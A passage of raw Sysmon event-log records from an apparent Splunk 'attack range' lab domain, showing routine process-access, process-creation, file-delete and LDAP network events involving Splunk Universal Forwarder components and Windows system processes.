Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.610{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10E1-6216-F704-000000003802}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.610{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.610{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.610{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.610{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.610{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-10E1-6216-F704-000000003802}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.610{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10E1-6216-F704-000000003802}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.611{C8EA50B7-10E1-6216-F704-000000003802}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.391{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=933B4F3C43CD5EB3F0A97C6708E6831D,SHA256=CC026E465CED28B1ABC1EAE61BB8867F5A8401108EF8F6A1C99B2692E095D546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:02.952{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75DFF5EBAB2D769AD6EE771C7BD5733D,SHA256=1251B211E98D9CA4424C0B1BB308D039F47116D0A6E4B47ADB03D9F8592EA873,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:02.422{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6909AF9BB66A1F7BE49E1E120671440,SHA256=31981BB76894810B22F6BF95B84E3D0A67A5DB5E3E50FDE74661ED240A8E51AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:02.110{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10E2-6216-F804-000000003802}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:02.110{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:02.110{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:02.110{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:02.110{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-10E2-6216-F804-000000003802}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:02.110{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:02.110{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10E2-6216-F804-000000003802}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:02.111{C8EA50B7-10E2-6216-F804-000000003802}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:03.952{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB8036F3CA6C514AF153AB8E3ADABA42,SHA256=F795A0093138A4B17785EFC6A576E11C66AA0E755E255F10D2DB18D40AE4E57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:03.438{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2744016247E2F87B3111A885A4910F94,SHA256=7404C0D8CC3F3CE2B8F9AAA117BF9FF52139B5A350D96502656D60C0A4D7EBCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:04.967{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CDAA0AB84F962BA869A536524022DAC,SHA256=05770EF329F6AF1597F31C291EAD773E4D046CC2BE8E3EFB438A46FF9C3733D9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:03.177{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53400-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:03.177{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53400-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000287234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.469{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6744092F7785CBA9F75B1545D5B604A6,SHA256=F1D305EB217ED879DD40AA5C22E4FE1875872F4032CB8B41A628BA3F417AE4F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.126{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10E4-6216-F904-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.126{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.126{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.126{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.126{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.126{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-10E4-6216-F904-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.126{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10E4-6216-F904-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 